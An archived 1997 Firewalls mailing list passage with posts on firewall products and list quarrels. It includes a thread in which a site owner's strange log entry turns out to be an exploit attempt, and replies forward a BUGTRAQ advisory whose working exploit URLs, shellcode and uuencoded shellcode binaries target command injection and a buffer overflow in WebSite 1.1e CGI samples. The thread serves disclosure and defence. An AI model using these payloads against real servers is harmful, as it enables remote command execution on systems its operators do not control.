talk to in Sun Singapore for FW and SunScreen training? > > What is the mailing list for Checkpoint/Solstice Firewall-1 users? > > > > Thank you very much for your kindness. :-) > > > > Yours, > > Dexter D. Laggui > > Systems Engineer > > > > drexx@sunphil.mozcom.com > > Philippine Systems Products Inc. > > > > > > ----- End Included Message ----- > > > > ----- End Included Message ----- From firewalls-owner Tue Jan 7 20:14:12 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA04342 for firewalls-outgoing; Tue, 7 Jan 1997 19:47:19 -0800 (PST) Received: from mailbox1.standard.com (netnews.stdin.com [198.107.111.34]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA04314 for ; Tue, 7 Jan 1997 19:46:58 -0800 (PST) Received: from jallen.standard.com (jallen.standard.com [198.182.191.76]) by mailbox1.standard.com (8.7.5/8.7.3) with SMTP id TAA11113; Tue, 7 Jan 1997 19:40:53 -0800 (PST) Date: Tue, 7 Jan 97 19:38:15 -0800 From: John Allen Subject: Re: Multi-FW Gateway management GUI To: "Stout, Bill" , "'Firewall List'" X-Mailer: Chameleon ATX 6.0.1, Standards Based IntraNet Solutions, NetManage Inc. X-Priority: 3 (Normal) References: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk --- On Tue, 7 Jan 1997 13:56:12 -0800 So and So named "Stout, Bill" wrote: > I'm collecting basic requirements for FW-farm management > applications for an internal instructional document. > > What I've thought of so far is the following: > > > BLAH BLAH AND BLAH were said > > Comments? Which are overkill and which should I add? > > Bill Stout > How about a ten million dollar budget - nice bunch of ideas, but you wont get it all to work, I use a product with 1/10 of these features, I paid a lot of money for the ones I have - and they still have bugs. Nice try, You also need strong partnership with key vendors for distribution and support without this - your product will fail even though your product has all these features. Make it Shareware for $39.00, and you will probably make enough to have an Internet account for a few years. Security software is no laughing matter, and it is usually complex, it usually comes with a disclaimer that what ever it doesnt do - isnt covered - and what it is supposed to do - might not do it. Best of luck. =========================================================================== John Allen E-mail:jallen@standard.com Network Development Group Telephone: (503) 321-6189 Standard Insurance, Portland Oregon FAX: (503) 321-7290 > 1. An initial GUI which allows an administrator to view > multiple gateways, ports, alert status, and proxy states. > > 2. The ability to select a proxy and view configuration > information on that proxy on a specific gateway. > > 3. The ability to delegate departmental security. > > 4. The ability to manage individual user authentication > per proxy. > > 5. The ability to centrally view logs. > > 6. The ability to send pages on specific events. > > 7. If located on the same DMZ subnet as the gateways, > the ability to sniff packets and graphically organize > them, other basic network management monitoring. > > 8. A sanity-check utility which looks for obvious proxy > filter configuration errors. > > 9. A tripwire utility to display alerts on file and process > state changes. > > 10. 'Courtney' for farms? > > 11. Instant traceback utility to collect suspicious host > information (DNS data, traceroute, whois, traffic type, > etc). > > 12. Time synchronization verification for accurate log > comparisons. > > 13. Strongly encrypted and authenticated administrative channels. > > 14. Load balancing? > > Comments? Which are overkill and which should I add? > > Bill Stout > ---------------End of Original Message----------------- How about a ten million dollar budget - nice bunch of ideas, but you wont get it all to work, I use a product with 1/10 of these features, I paid a lot of money for the ones I have - and they still have bugs. Nice try, You also need strong partnership with key vendors for distribution and support without this - your product will fail even though your product has all these features. Make it Shareware for $39.00, and you will probably make enough to have an Internet account for a few years. Security software is no laughing matter, and it is usually complex, it usually comes with a disclaimer that what ever it doesnt do - isnt covered - and what it is supposed to do - might not do it. Best of luck. From firewalls-owner Tue Jan 7 20:29:20 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA04930 for firewalls-outgoing; Tue, 7 Jan 1997 19:56:45 -0800 (PST) Received: from dhp.com (dhp.com [199.245.105.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA04899 for ; Tue, 7 Jan 1997 19:56:31 -0800 (PST) Received: (from lucifer@localhost) by dhp.com (8.8.4/8.6.12) id WAA20700; Tue, 7 Jan 1997 22:10:40 -0500 Date: Tue, 7 Jan 1997 22:10:40 -0500 Message-Id: <199701080310.WAA20700@dhp.com> To: firewalls@greatcircle.com From: Mixmaster X-Comment1: This message did not originate from the X-Comment2: above address. It was automatically remailed X-Comment3: by an anonymous mail service. Please report X-Comment4: problems or inappropriate use to X-Comment5: Subject: IS Wilner@DOCKMASTER.NCSC.MIL A NET.LOON Sender: firewalls-owner@GreatCircle.COM Precedence: bulk To: firewalls@greatcircle.com cc: Subject: IS Wilner@DOCKMASTER.NCSC.MIL A NET.LOON -------- Some people thinks they are O/S gods just because of a DOCKMASTER address... since WILNER thinks this is a reason to conduct ad-hominem attacks on members of the firewalls list such as MJR(who was around LONG before wilner) I am starting to question whether Wilner@DOCKMASTER.NCSC.MIL is really the NET.LOON Dr. Fred Cohen in Disguise? Anon p.s. Sorry for the noise listmaster!! From firewalls-owner Tue Jan 7 20:45:59 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA01705 for firewalls-outgoing; Tue, 7 Jan 1997 19:08:02 -0800 (PST) Received: from mule1.mindspring.com (mule1.mindspring.com [204.180.128.167]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA01671 for ; Tue, 7 Jan 1997 19:07:36 -0800 (PST) Received: from [207.69.170.21] (user-37kbahh.dialup.mindspring.com [207.69.170.49]) by mule1.mindspring.com (8.8.4/8.8.4) with SMTP id WAA33798; Tue, 7 Jan 1997 22:05:59 -0500 Date: Tue, 7 Jan 1997 22:05:59 -0500 X-Sender: pelicans@pop.mindspring.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Wilner@DOCKMASTER.NCSC.MIL From: pelicans@mindspring.com (BeachCruiser) Subject: Re: Re: NCSA != NCSC Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 2:53 PM 1/7/97, Wilner@DOCKMASTER.NCSC.MIL wrote: >> I have to say up front that I agree with MJR. >> >> . . . if the firewall software is implemented below the O/S layer >> . . . then the O/S will never even "see" . . . > >Everything except boot-up depends upon the O/S. Nothing is below the "O/S >layer," nor does one speak of such a layer unless one intends "application >layer" and doesn't know an application from an O/S, nor can a single byte be >sent or retrieved over a device (networked or otherwise) unless an O/S is >relied upon, nor can a single access to memory, disk, or what-have-you be >performed by networking code "below the O/S layer," as we so quaintly say, >if there is no O/S involved. > >Gentlemen, if this represents your understanding of operating systems and >security, please contribute to alt.brush-sellers, not to firewalls. Easy Bruce, this is only firewalls at Mr. Rogers Neighborhood, not INFOSEC up at 20755. :) :) :) ___________________________ Bob McKisson Director of Cooth & Decorum Cypress Systems Corporation Virginia Beach, VA 23451 (757) 425-4195 Voice (757) 425-4196 FAX (757) 442-0888 STU-III pelicans@mindspring.com I don't give them hell...I just give them the truth, and they think it's hell. - Harry Truman From firewalls-owner Tue Jan 7 20:59:29 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id UAA08565 for firewalls-outgoing; Tue, 7 Jan 1997 20:50:45 -0800 (PST) Received: from ginger.vnet.net (ginger.vnet.net [166.82.1.69]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id UAA08523 for ; Tue, 7 Jan 1997 20:50:22 -0800 (PST) Received: from jimi.vnet.net (jimi.vnet.net [166.82.1.19]) by ginger.vnet.net (8.8.4/8.8.2) with ESMTP id XAA01217 for ; Tue, 7 Jan 1997 23:50:52 -0500 (EST) Received: from sdg (galip.vnet.net [166.82.174.200]) by jimi.vnet.net (8.8.4/8.8.4) with SMTP id WAA13206 for ; Tue, 7 Jan 1997 22:06:47 -0500 (EST) Message-ID: <32D30E6B.79D2@hon.com> Date: Tue, 07 Jan 1997 22:03:07 -0500 From: Steve Reply-To: Steve@hon.com Organization: sdg consulting X-Mailer: Mozilla 3.01Gold (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Log entry Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, Recently, I recorded a log entry that was _very_ unusual and if someone could advise where I might seek information on deciphering entries such as the below it would be muchly appreciated. A book, white paper, anything.. 207.91.166.17 www.(snip).com - [07/Jan/1997:19:56:50 -0500] "GET /cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D HTTP/1.0" 500 0 "" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)" I believe this connection also caused a Watson error. The only exe I am running is for my hit counter. Thanks in advance Steve Steve@hon.com From firewalls-owner Tue Jan 7 21:21:22 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA25315 for firewalls-outgoing; Tue, 7 Jan 1997 17:51:50 -0800 (PST) Received: from elm.ncs.com.sg (elm.ncs.com.sg [203.116.16.17]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id RAA25306 for ; Tue, 7 Jan 1997 17:51:38 -0800 (PST) Received: from Henry.ncs.com.sg (thunder.ncs.com.sg [203.116.16.66]) by elm.ncs.com.sg (8.7.3/8.7.3) with SMTP id JAA27672; Wed, 8 Jan 1997 09:41:28 +0800 (SGT) Message-ID: <32D2FC75.7696@ncs.com.sg> Date: Wed, 08 Jan 1997 09:46:29 +0800 From: Henry Lim Chee Wee Organization: National Computer Systems Pte Ltd X-Mailer: Mozilla 3.0Gold (Win95; I) MIME-Version: 1.0 To: "Starkweather, Mike" CC: firewalls@GreatCircle.COM Subject: Re: Pointcast References: Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Starkweather, Mike wrote: > > I am wondering how the members of this mail list have handled the > flood of traffic generated by Pointcast. It has buried our firewall > (Tis Toolkit) with the huge number of requests it generates. Their > I-Server seems to help some but not as much as I had hoped. > > If this is the wrong place for this question please redirect me. > > Mike Starkweather > Anheuser-Busch This is not much of a firewall question, but... If you are using I-Server from PointCast, then you should be able to put the server directly to the firewall, downloading pointcast's information at regular intervals of the day. That will only constitute one request on the firewall per download. Subsequently, all of your users should download the information from the I-Server and NOT directly from PointCast. However, remember to ask your users to upgrade their pointcast client to version 1.1. On the finer details, you can check it out at : http://www.pointcast.com/support/iserver/faqs/cliredir.html -- _ 0 (_| |(_~|^~~| "I-dare-you geysering forth with TT/_ T"T heartacious good will" ^^^^^^^^^^^^^^nitro ^^^^^^^^^^^^^ ææææææææ A Happy New Year To All !!! ææææææææ From firewalls-owner Tue Jan 7 22:29:45 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA15964 for firewalls-outgoing; Tue, 7 Jan 1997 21:55:08 -0800 (PST) Received: from news2.mnsinc.com (news2.mnsinc.com [206.55.3.16]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id VAA15903 for ; Tue, 7 Jan 1997 21:54:49 -0800 (PST) Received: from matrix.erols.com (smanning.mnsinc.com [206.239.28.60]) by news2.mnsinc.com (8.8.3/8.7.3) with SMTP id AAA17354 for ; Wed, 8 Jan 1997 00:54:23 -0500 (EST) Message-Id: <199701080554.AAA17354@news2.mnsinc.com> Comments: Authenticated sender is From: "matrix" To: Date: Wed, 8 Jan 1997 00:51:01 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: USAF: how it was hacked In-reply-to: <199701080136.UAA14304@unix1.sysnet.net> X-mailer: Pegasus Mail for Win32 (v2.50) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Matthew Patton wrote... > > Really quite anticlimatic. The infamous phf script was left active on > the server and was how they got in. Root, the whole 9 yards. Really? What are these statements based on? Could we please keep the rumors to a dull roar? Thanks! Stephen Manning, Special Agent Computer Crime Investigator Air Force Office of Special Investigations Voice: (301) 981-5469 - Fax: (301) 981-3087 From firewalls-owner Tue Jan 7 22:44:07 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id WAA17448 for firewalls-outgoing; Tue, 7 Jan 1997 22:05:56 -0800 (PST) Received: from darkstar.sysinfo.com (darkstar.sysinfo.com [204.246.65.62]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id WAA17412 for ; Tue, 7 Jan 1997 22:05:39 -0800 (PST) Received: from parka.winternet.com (dufresne@parka.winternet.com [198.174.169.9]) by darkstar.sysinfo.com (8.8.2/8.8.2) with SMTP id AAA03757; Wed, 8 Jan 1997 00:07:00 -0600 Date: Tue, 7 Jan 1997 23:59:49 -0600 (CST) From: Ron DuFresne To: Steve cc: firewalls@GreatCircle.COM Subject: Re: Log entry In-Reply-To: <32D30E6B.79D2@hon.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 7 Jan 1997, Steve wrote: > Hi, > > Recently, I recorded a log entry that was _very_ unusual and if someone > could advise where I might seek information on deciphering entries such > as the below it would be muchly appreciated. A book, white paper, > anything.. > > 207.91.166.17 www.(snip).com - [07/Jan/1997:19:56:50 -0500] "GET > /cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D > HTTP/1.0" 500 0 "" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)" > > I believe this connection also caused a Watson error. The only exe I am > running is for my hit counter. > >From solar@ideal.ruTue Jan 7 23:58:13 1997 Date: Mon, 6 Jan 1997 20:56:21 -0500 From: solar@ideal.ru To: Multiple recipients of list BUGTRAQ Resent-Date: Wed, 8 Jan 1997 00:04:23 -0600 (CST) Resent-From: "R. DuFresne" Resent-To: Ron DuFresne Resent-Subject: Resent mail.... Hi! Actually, this message is about buffer overflows in Windows, in general. But let me put some exploits in here first. I just happened to check out WebSite v1.1e for Windows NT and '95. There're some nice security holes there, in the CGI example programs (should I say - "as usual"?). The first thing that I noticed is about the scripts, they have the following lines in cgi-dos/args.cmd (and some others): > rem NEVER NEVER ECHO URL COMPONENTS UNQUOTED!!! Consider > rem a query string of xxx&del+/s+c:\*.* Your hard drive gets > rem erased!! Same goes for args and extra path info!!! and then some lines like this: > echo QUERY_STRING="%QUERY_STRING%" Obviously, just using the quotes is not enough. Why can't I close them, or use a linefeed? The exploit can be: http://website.host/cgi-dos/args.cmd?"&any+dos+command" Well, the stuff I just told about might be too obvious, some sysadmins I know already have all the example scripts removed. Now, let's get to the interesting stuff. There's also an example C program, compiled to cgi-shl/win-c-sample.exe, with the source provided in cgi-src/win-c-sample/win-c-sample.c, and the following line in there: > char *argv[32]; // Max 32 command line args That's a WinMain local variable, and is passed to SplitArgs(), which does no bounds checking while filling it with the command line parameters. You know what that means -- a nice buffer overflow. Here are the exploits (I split the long URLs into several lines), you can use any dos command in them (replace spaces with _'s): -- WinNT (any version?): http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A %06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10% FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy _\WebSite\readme.1st_\WebSite\htdocs\x1.htm -- Win95 (the release version only, will crash others!): http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A %06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0 3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\ x1.htm The example dos commands just copy the WebSite's readme.1st file, so you can later check if the exploit worked by trying http://website.host/x1.htm. Note that the server should respond to these exploits with an "Error: no blank line separating header and data", because of the "1 file(s) copied" message appearing without a blank line before it (which is required for HTTP; if you need a command's output, you can redirect it to a file, and get that file via HTTP with a separate request). Finally, to the thing I'm writing this message for -- I mean the Win32 shellcode. I haven't seen any Win32 overflow exploits before (actually, didn't look for them), so I had to code my own shellcode. This seems not to be that simple as it would be for Win16, or as it is for most UNIX systems. The problem is that normally Windows kernel calls require extra relocation items, but the shellcode appears in an already loaded program. The solution I used in the exploits above is doing a call to fixed kernel offset. Actually, the WinNT exploit does pattern searches in the kernel (due to the number of different kernel versions out there), while the Win95 one uses fixed offsets (I don't have Win95 myself, thanks must go to Lord Byte for loading his WinIce and telling me the offsets). The two functions I use are WinExec and ExitProcess. Here're the two shellcodes in binary, uuencoded, so you can use them in your own exploits if you wish. begin 644 shell_nt.bin M:%Y8_^;_U(/&3&H!5HH&/%]U`X`N/T9!283`=?!H,!#P=UEH35QY6U@%,%!Z F4$$Y`77P@^D0_]%H,!#P=UEHT%!V3%@%,#!V4$$Y`77P@^D<_]'[ ` end begin 644 shell_95.bin M:%Y8_^;_U(/&,FH!5HH&/%]U`X`N/T9!283`=?"Z=&]\7[ET8'U@`\K_T;I8 ,7WQ?N5A0?&`#RO_1 ` end Note that I had to avoid using some codes (which the server didn't allow me to use), that's why I do things like: db 68h ; push imm32 pop esi ; \ pop eax ; | - the value being pushed jmp esi ; / call esp instead of: call $+5 ; would contain zeroes pop esi Have fun disassembling. I'll appreciate any suggestions on doing the kernel calls a better way. As for the holes -- the fix is obvious, just remove the examples after you, the webmaster, have checked them out. Also, the holes will probably get fixed in the next WebSite release (I wonder if they credit me;-). BTW, they didn't even have the quotes in scripts I mentioned above, in some earlier versions. Signed, Solar Designer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Tue Jan 7 23:31:03 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA23258 for firewalls-outgoing; Tue, 7 Jan 1997 23:23:14 -0800 (PST) Received: from ginger.vnet.net (ginger.vnet.net [166.82.1.69]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id XAA23225 for ; Tue, 7 Jan 1997 23:22:57 -0800 (PST) Received: from jimi.vnet.net (jimi.vnet.net [166.82.1.19]) by ginger.vnet.net (8.8.4/8.8.2) with ESMTP id CAA11294 for ; Wed, 8 Jan 1997 02:23:25 -0500 (EST) Received: from sdg (galip.vnet.net [166.82.174.200]) by jimi.vnet.net (8.8.4/8.8.4) with SMTP id CAA21415 for ; Wed, 8 Jan 1997 02:22:40 -0500 (EST) Message-ID: <32D34A61.230B@hon.com> Date: Wed, 08 Jan 1997 02:18:57 -0500 From: Steve Gallipeau Reply-To: Steve@hon.com Organization: sdg consulting X-Mailer: Mozilla 3.01Gold (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Re: Log Entry Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk All, Thank you for the many responses..much faster then even CERT! As it turns out, I had been corresponding with someone regarding the security of my site and had asked him to take a look at it. Although in this case, a false alarm, it sure woke me up to the fact that I need to make things a lot more secure. Thanks again. Steve Steve@hon.com From firewalls-owner Wed Jan 8 00:04:17 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id XAA25077 for firewalls-outgoing; Tue, 7 Jan 1997 23:49:33 -0800 (PST) Received: from thol.vitel.com.sg (thol.vitnet.com.sg [203.120.113.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id XAA25054 for ; Tue, 7 Jan 1997 23:49:16 -0800 (PST) Received: by thol.vitel.com.sg (940816.SGI.8.6.9/940406.SGI.AUTO) id QAA06904; Wed, 8 Jan 1997 16:09:06 -0800 Received: from web(172.16.254.20) by thol via smap (v3.0.1) id sma006901; Wed, 8 Jan 97 16:08:38 -0800 Message-ID: <32D43706.41C6@vitnet.com.sg> Date: Wed, 08 Jan 1997 16:08:38 -0800 From: Damien Miller X-Mailer: Mozilla 3.0Gold (X11; I; IRIX 5.3 IP22) MIME-Version: 1.0 To: Steve@hon.com, firewalls@greatcircle.com Subject: Re: Log entry References: <32D30E6B.79D2@hon.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steve wrote: > > Hi, > > Recently, I recorded a log entry that was _very_ unusual and if someone > could advise where I might seek information on deciphering entries such > as the below it would be muchly appreciated. A book, white paper, > anything.. > > 207.91.166.17 www.(snip).com - [07/Jan/1997:19:56:50 -0500] "GET > /cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D > HTTP/1.0" 500 0 "" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 95)" > > I believe this connection also caused a Watson error. The only exe I am > running is for my hit counter. This is an attempt to exploit a buffer overrun in your (WebSite) server. Below is a post made to BUGTRAQ earlier this week. I expect to see more NT buffer overrun exploits now that someone has published shellcodes. Yet more proof that security through obscurity is insufficient. Regards, Damien Miller -- /--------------------------------------------------------------------------\ | Damien Miller --- Technical Consultant Vitnet Pte Ltd (Singapore) | | "Show me a sane man and I will cure him for you" - C. G Jung (1875-1961) | \--------------------------------------------------------------------------/ ---------- Begin forwarded message Subject: Date: Mon, 6 Jan 1997 20:56:21 -0500 From: solar@ideal.ru To: Multiple recipients of list BUGTRAQ Hi! Actually, this message is about buffer overflows in Windows, in general. But let me put some exploits in here first. I just happened to check out WebSite v1.1e for Windows NT and '95. There're some nice security holes there, in the CGI example programs (should I say - "as usual"?). The first thing that I noticed is about the scripts, they have the following lines in cgi-dos/args.cmd (and some others): > rem NEVER NEVER ECHO URL COMPONENTS UNQUOTED!!! Consider > rem a query string of xxx&del+/s+c:\*.* Your hard drive gets > rem erased!! Same goes for args and extra path info!!! and then some lines like this: > echo QUERY_STRING="%QUERY_STRING%" Obviously, just using the quotes is not enough. Why can't I close them, or use a linefeed? The exploit can be: http://website.host/cgi-dos/args.cmd?"&any+dos+command" Well, the stuff I just told about might be too obvious, some sysadmins I know already have all the example scripts removed. Now, let's get to the interesting stuff. There's also an example C program, compiled to cgi-shl/win-c-sample.exe, with the source provided in cgi-src/win-c-sample/win-c-sample.c, and the following line in there: > char *argv[32]; // Max 32 command line args That's a WinMain local variable, and is passed to SplitArgs(), which does no bounds checking while filling it with the command line parameters. You know what that means -- a nice buffer overflow. Here are the exploits (I split the long URLs into several lines), you can use any dos command in them (replace spaces with _'s): -- WinNT (any version?): http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A %06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10% FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy _\WebSite\readme.1st_\WebSite\htdocs\x1.htm -- Win95 (the release version only, will crash others!): http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+- +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A %06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0 3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\ x1.htm The example dos commands just copy the WebSite's readme.1st file, so you can later check if the exploit worked by trying http://website.host/x1.htm. Note that the server should respond to these exploits with an "Error: no blank line separating header and data", because of the "1 file(s) copied" message appearing without a blank line before it (which is required for HTTP; if you need a command's output, you can redirect it to a file, and get that file via HTTP with a separate request). Finally, to the thing I'm writing this message for -- I mean the Win32 shellcode. I haven't seen any Win32 overflow exploits before (actually, didn't look for them), so I had to code my own shellcode. This seems not to be that simple as it would be for Win16, or as it is for most UNIX systems. The problem is that normally Windows kernel calls require extra relocation items, but the shellcode appears in an already loaded program. The solution I used in the exploits above is doing a call to fixed kernel offset. Actually, the WinNT exploit does pattern searches in the kernel (due to the number of different kernel versions out there), while the Win95 one uses fixed offsets (I don't have Win95 myself, thanks must go to Lord Byte for loading his WinIce and telling me the offsets). The two functions I use are WinExec and ExitProcess. Here're the two shellcodes in binary, uuencoded, so you can use them in your own exploits if you wish. [snip] Note that I had to avoid using some codes (which the server didn't allow me to use), that's why I do things like: db 68h ; push imm32 pop esi ; \ pop eax ; | - the value being pushed jmp esi ; / call esp instead of: call $+5 ; would contain zeroes pop esi Have fun disassembling. I'll appreciate any suggestions on doing the kernel calls a better way. As for the holes -- the fix is obvious, just remove the examples after you, the webmaster, have checked them out. Also, the holes will probably get fixed in the next WebSite release (I wonder if they credit me;-). BTW, they didn't even have the quotes in scripts I mentioned above, in some earlier versions. Signed, Solar Designer ---------- From firewalls-owner Wed Jan 8 00:48:36 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id AAA28626 for firewalls-outgoing; Wed, 8 Jan 1997 00:31:07 -0800 (PST) Received: from ns.bcn.servicom.es (ns.bcn.servicom.es [194.106.1.132]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id AAA28572 for ; Wed, 8 Jan 1997 00:30:39 -0800 (PST) From: ricard.scorpion@bcn.servicom.es Received: from ricard.scorpion.com by ns.bcn.servicom.es (8.6.11/FI-3.3) Wed, 8 Jan 1997 09:35:06 +0100 Message-Id: <199701080835.JAA03125@ns.bcn.servicom.es> To: firewalls@greatcircle.com Subject: Fw: Altavista firewall help Date: Wed, 9 Oct 1996 09:27:59 +0100 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1085 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ---------- > From: Ricard Vilata i Salvanera > To: firewalls-owner@GreatCircle.com > Subject: Altavista firewall help > Date: martes 8 de octubre de 1996 5:50 > > Hi, > > I'm evaluating altavista firewall to implement our company internet > security, I want to use two different levels of firewalling: IP filtering > and application proxy. Our platform will be Windows NT. I would like to > use a DMZ implementation with altavista firewall and MS Proxy Server. Can > anybody tell me if I'm wrong ? I don't know nothing about altavista > performance for more than 50 concurrent users. Have you any product > comparation between Altavista and Forewall-1 ? > > Please, can anybody help me with more data or experience ? > > -- > Ricard Vilata > Business Area Manager > ricard.scorpion@bcn.servicom.es > _________________________________ From firewalls-owner Wed Jan 8 01:34:12 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id BAA02927 for firewalls-outgoing; Wed, 8 Jan 1997 01:17:04 -0800 (PST) Received: from kilkenny.tip.net (kilkenny.tip.net [192.36.73.16]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id BAA02893 for ; Wed, 8 Jan 1997 01:16:45 -0800 (PST) Received: from ns.berendsen.com ([194.19.168.20]) by kilkenny.tip.net (8.6.12/8.6.12) with ESMTP id KAA18493 for ; Wed, 8 Jan 1997 10:16:07 +0100 Received: from ns1 (ns1.sbi.net [194.19.168.33]) by ns.berendsen.com (8.7.3/8.7.3) with SMTP id KAA13830 for ; Wed, 8 Jan 1997 10:15:30 +0100 (MET) Message-ID: <32D365DE.41EB@sbi.net> Date: Wed, 08 Jan 1997 10:16:14 +0100 From: michael dreves Organization: Berendsen Components X-Mailer: Mozilla 3.01Gold (X11; I; SunOS 5.5.1 sun4m) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: Firewalls-Digest V6 #8 References: <199701080648.WAA21235@miles.greatcircle.com> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hej s=F8de sus, her kommer flemmings nye e-mail....der er faktisk tale om to addresser, som vi skal proeve: drc@drc.baku.az (Danish Refugee Council. fdr@drc.baku.az (formentelig flemming) kh. -- michael dreves (MD113-RIPE), System Consultant = Berendsen Data, Phone +45-39577300, Fax +45-39577302 Key fingerprint =3D 01 99 2B 6F F1 2E 47 4D 87 6D 98 55 91 42 F8 4D From firewalls-owner Wed Jan 8 01:44:45 1997 Received: (majordom@localhost) by miles.greatcircle.com 